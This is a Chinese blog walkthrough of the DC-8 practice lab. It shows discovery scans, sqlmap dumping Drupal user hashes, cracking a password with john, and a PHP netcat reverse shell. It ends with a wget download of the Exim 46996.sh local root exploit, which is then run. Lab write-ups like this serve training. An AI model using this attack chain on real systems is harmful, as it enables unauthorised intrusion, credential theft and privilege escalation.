其他分享
首页 > 其他分享> > DC8靶机渗透测试

DC8靶机渗透测试

作者:互联网

文章目录


环境版本:

一、信息收集

1.主机发现

arp-scan -l

在这里插入图片描述

发现靶机 ip 为192.168.1.111

2.端口扫描

nmap -A -p- 192.168.1.111

在这里插入图片描述

发现其开启了 22 ssh、80 web服务 drupal cms

二、漏洞挖掘、利用

1.访问靶机 web 服务

对其进行信息收集(遍历网页)
在这里插入图片描述

在点击 welcome to dc-8 后发现 url 带了 nid 尝试 SQLmap 梭

在这里插入图片描述

2.使用 SQLmap 进行爆内容

sqlmap -u http://192.168.1.111/?nid=1 --dbs
sqlmap -u http://192.168.1.111/?nid=1 -D d7db --tables 
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.1.111/?nid=1 -D d7db -T users -C uid,name,pass --dump

在这里插入图片描述

3.使用 john 进行爆破 hash

1)将 pass 内容每行一个保存到 DC7-pass.txt
2)进行爆破

john ./DC7-pass.txt

在这里插入图片描述

只爆破出 1 个,测试得知其为 john 账号密码

john turtle

4.目录扫描

进行目录扫描查找入口点

nikto -h 192.168.1.111

在这里插入图片描述

5.登陆后台进行查找可编辑 PHP 页面

在这里插入图片描述

插入 nc 连接
在这里插入图片描述

6.获取 shell

1)靶机监听

nc -lvvp 9999

2)提交表单页面执行 php 代码进行触发

在这里插入图片描述
在这里插入图片描述

得到靶机 shell

三、提权

1.尝试 suid 提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现 exim4

2.使用 python 获得交互式 shell

python -c "import pty;pty.spawn('/bin/sh')"

3.尝试使用 exim4 进行提权

1)查看版本信息

exim4 --version

在这里插入图片描述

2)在 kali 中搜索相关漏洞

searchsploit exim 4

在这里插入图片描述

使用

Exim 4.87 - 4.91 - Local Privilege Escalation       | linux/local/46996.sh

查看 exp 其内容

cd /usr/share/exploitdb/exploits/linux/local 
cat 46996.sh

在这里插入图片描述

发现两种执行方式,这里我们使用第二种

3)将 exp 复制到桌面

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/Desktop/exp.sh

4)查看 exp 格式

vim ./exp.sh 
:set ff    #查看文件格式 
:set ff=unix    #更改文件格式

5)使用 python 打开 http 服务进行传输文件

cd /root/Desktop 
python -m SimpleHTTPServer 8888

6)靶机 shell 使用 wget 获取文件、利用

cd /tmp    #进入tmp目录,我们使用的exp需要写权限,tmp目录所有用户权限均为7 
wget http://192.168.1.123:8888/exp.sh    #使用wget获取exp 
chmod 777 ./exp.sh    #增加权限 
./exp.sh -m netcat    #使用脚本

在这里插入图片描述

得到权限

cat /root/flag.txt

在这里插入图片描述

标签:DC8,渗透,192.168,提权,sh,exp,靶机,1.111
来源: https://blog.csdn.net/Huangshanyoumu/article/details/115800380